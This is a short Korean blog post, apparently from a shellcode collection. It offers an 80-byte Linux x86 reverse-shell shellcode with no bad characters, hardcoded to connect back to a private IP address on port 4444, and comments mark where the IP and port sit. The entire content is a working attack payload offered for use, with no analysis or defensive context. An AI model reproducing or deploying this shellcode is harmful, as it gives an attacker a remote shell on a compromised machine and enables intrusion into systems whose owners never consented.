본문 바로가기

List/Shellcode

bad chars 없는 Reverse bind shellcode , 80byte

port 4444


shellcode = ("\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68"

"\xc0\xa8\xde\xa4" #ip

"\x66\x68"

"\x11\x5c" #port

"\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0"

"\x66\xcd\x80\x52\xb8\x44\x44\x44\x44\x35\x2a\x6b\x37\x2c\x50\xb8\x44\x44"

"\x44\x44\x35\x6b\x6b\x26\x2d\x50\x31\xc0\x31\xc9\x89\xe3"

"\xb0\x0b\xcd\x80")